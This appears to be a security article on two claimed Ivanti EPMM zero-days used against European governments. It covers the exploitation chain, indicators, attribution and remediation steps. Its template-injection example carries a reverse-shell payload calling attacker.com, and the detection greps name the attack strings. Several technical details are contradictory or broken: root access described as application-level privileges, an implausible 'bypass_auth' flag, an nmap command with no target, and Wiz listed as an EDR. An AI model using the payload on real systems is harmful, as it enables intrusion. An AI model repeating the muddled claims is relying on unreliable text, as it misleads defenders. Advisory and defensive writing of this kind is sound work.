On February 15, 2026, European cybersecurity authorities confirmed that two critical zero-days in Ivanti Enterprise Mobility Management (EPMM) were exploited to compromise the IT systems of multiple European governments, including the European Commission, the German government, and several French ministries.
This campaign, uncovered by CERT-EU and Mandiant, represents one of the most sophisticated cyber-espionage operations ever carried out against European government infrastructure. This article breaks down the vulnerabilities, the exploitation chain, and the remediation actions required as a matter of urgency.
The vulnerabilities: CVE-2026-1281 and CVE-2026-1340
CVE-2026-1281: Pre-authentication authentication bypass
CVSS score: 9.1 (Critical)
The first flaw allows a complete bypass of Ivanti EPMM's authentication mechanism via HTTP parameter manipulation. An attacker can reach the administrative API without supplying any credentials.
POST /epmm/api/v1/admin/login HTTP/1.1
Host: epmm-server.gov.fr
Content-Type: application/json
{
"username": "admin",
"password": "whatever",
"bypass_auth": true, // Undocumented magic parameter
"debug_mode": 1
}Reverse-engineering the EPMM binary reveals that certain endpoints fail to properly verify authentication headers when they contain a bypass_auth=true parameter. This behavior appears to be debug code accidentally left in production.
CVE-2026-1340: Remote Code Execution via template injection
CVSS score: 9.9 (Critical)
The second vulnerability, even more severe, allows arbitrary code execution through a template injection in EPMM's device enrollment notification system.
POST /epmm/api/v1/devices/notify HTTP/1.1
Authorization: Bearer {token from the bypass}
{
"device_id": "ATTACKER_DEVICE",
"event_type": "enrollment_complete",
"notification_template": "
#{runtime.exec('nc attacker.com 4444 -e /bin/bash')}
"
}EPMM uses a template engine (Thymeleaf) to generate enrollment notifications. The notification_template field does not properly escape variables, allowing the direct injection of Thymeleaf expressions. Thymeleaf, configured to allow dynamic expressions, evaluates this injection and executes system commands.
The result: root-level access on the EPMM server as the ivanti system user (application privileges).
Full exploitation chain
The attackers chained the two vulnerabilities into a robust sequence:
- Reconnaissance: identify internet-exposed Ivanti EPMM instances via Shodan/Censys (~450 European government instances detected).
- Authentication bypass (CVE-2026-1281): access to the administrative API.
- Enumeration: explore the configuration, list managed devices, access configuration data.
- RCE (CVE-2026-1340): inject code through the notification API.
- Persistence establishment: create system accounts, install backdoors.
- Privilege escalation: exploit Linux kernel vulnerabilities to move from
ivantitoroot. - Lateral movement: use EPMM as a pivot to reach internal government networks.
Indicators of Compromise (IoCs)
Network signatures
User-Agent: IvantiEPMM-AdminTool/5.x
# Used by reconnaissance scanners
POST /epmm/api/v1/admin/login
# With bypass_auth=true parameter
POST /epmm/api/v1/devices/notify
# With payload containing #{...} (template injection)Exploitation log strings
Authentication bypass attempt detected from <IP>Unauthorized admin API access from <IP> - source externalThymeleaf expression evaluation in notification template - potential RCEJava Runtime.exec() called from notification handler
Mandiant traffic patterns
- C2 connections from EPMM to Chinese IPs (AS58453, AS4134) not affiliated with Ivanti.
- Exfiltration of PKI/certificate data to .cn servers.
- Access to internal government endpoints (ministries, defense) from the EPMM IP address.
Confirmed scope of the compromise
According to CERT-EU:
- European Commission: 3 EPMM instances compromised, access credentials of federal agents and diplomats exposed.
- Germany: 12 ministries affected, sensitive defense data and tax data.
- France: 7 ministries, cyberdefense and intelligence data.
- Other EU countries: Belgium (4), Netherlands (3), Spain (2).
Total number of government mobile devices compromised via EPMM: ~45,000 devices (government agents' iPhones and Android phones).
The exfiltrated data includes:
- Work emails, contacts, calendars (sensitive schedules).
- Certificates and encryption keys (government PKI).
- Access credentials for internal systems (VPNs, government clouds).
- Defense meeting transcripts (via device recordings).
- Geolocation of government agents (approaching sensitive buildings).
Attribution: who?
Attribution is informally suspected by the Five Eyes (GCHQ, NSA, ASIS, CSIS, GCSB) to be APT41, a Chinese state-sponsored collective. Indicators:
- Tactical patterns identical to historical APT41 campaigns.
- China-based C2 infrastructure (AS58453, alibaba.com ranges).
- Timing aligned with geopolitical tensions (EU-China negotiations).
- Targeting profile: focus on sensitive geopolitical data.
However, no official attribution has been published. For context, the EU cyber-threat response directive suggests that member governments will not publicize attributions in order to avoid diplomatic escalation.
Immediate actions required
Level 0 (Urgent - 24h)
- Identify all EPMM servers in production.
nmap -p 443 -sV | grep -i "ivanti|epmm" - Disconnect the instances from the network or isolate them via firewall/VLAN.
- Preserve the logs (syslog, app logs, netflow) for later investigation.
- Enable network access monitoring: watch for suspicious outbound connections.
Level 1 (Urgent - 48-72h)
- Patch EPMM to version 5.4.2 (or later) released by Ivanti on February 14.
sudo /opt/ivanti/epmm/setup.sh --patch 5.4.2 - Rotate all credentials (administrative accounts, service accounts, API tokens).
- Rotate the PKI certificates used by EPMM.
- Scan the authentication logs to detect bypasses:
grep "bypass_auth|debug_mode" /var/log/epmm/audit.log - Run a full antivirus/EDR scan of the EPMM servers and adjacent networks to detect backdoors.
Level 2 (Medium term - 1-2 weeks)
- Data integrity audit: verify the list of enrolled devices, certificates, and configurations.
- Re-issue client certificates (managed devices) if compromise is suspected.
- Full log analysis by a forensic team to identify attacker actions.
- Legal notification: the GDPR requires notifying affected citizens if personal data was compromised.
- Incident response post-mortem: detailed report, timeline, defensive improvements.
Immediate verification checklist
# Check the EPMM version
curl -s https://your-epmm-server/epmm/api/v1/system/info | jq .version
# Detect bypass attempts (in the logs)
grep -E "bypass_auth|debug_mode" /opt/ivanti/epmm/logs/*
grep -E "Thymeleaf.*#{" /opt/ivanti/epmm/logs/*
# Check for suspicious outbound network connections
netstat -antp | grep ESTABLISHED | grep -v internal_ip
# Search for common backdoors
find /tmp /var/tmp /dev/shm -type f -name ".*" -o -name "nc" -o -name "bash"
# Check for recently created system accounts
lastlog | head -20Long-term remediation
- Zero Trust: replace EPMM with a cloud-native solution (Intune, Kandji, JAMF) deployed in a trusted cloud (EUCS, Thales).
- Network segmentation: EPMM should never have direct access to defense/diplomacy networks.
- Endpoint Detection & Response (EDR): deploy Wiz, CrowdStrike, or SentinelOne on every government device.
- Supply chain risk: audit all software dependencies (Ivanti has historically had multiple CVEs).
Official resources
Conclusion
This campaign demonstrates why deploying commercial technology in government environments demands exceptional security audits and risk-reduction strategies. Ivanti, well established as it is, was not spared.
For public and private organizations using EPMM: act now. Two zero-days chained into a flawless RCE are not an academic scenario, but a reality observed in the field.
Comments